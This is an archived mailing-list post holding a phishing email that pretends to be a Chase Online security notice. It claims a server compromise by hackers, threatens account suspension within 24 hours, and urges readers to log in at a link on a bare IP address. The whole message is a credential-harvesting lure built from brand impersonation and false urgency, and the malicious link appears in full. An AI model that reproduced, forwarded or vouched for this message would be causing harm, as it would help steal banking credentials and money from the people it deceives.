[Xorp-hackers] Important Notice To All Customers

Chase Alerts jtc at acorntoolworks.com
Sun Jul 2 08:19:17 PDT 2017

Dear Customer,
Due to a recent compromise of our servers by some chinese hackers, It has
been mandated that we carry out an integrity check to isolate and disable
all
suspicious accounts. For now we have already placed a red flag on several
accounts
thereby preventing them from carrying out any financial transactions
whatsoever.
To ensure that your account was not compromised, you are required to
ascertain
your identity, failure to do this within 24 hours will lead to account
service
suspension.
Login and Ascertain Your Identity
<http://78.109.28.66/~egcrypto/services/chase/upd/strongauth.php>
Thanks for your anticipated co-operation and understanding.
The Accounts Team,
For Chase Online℠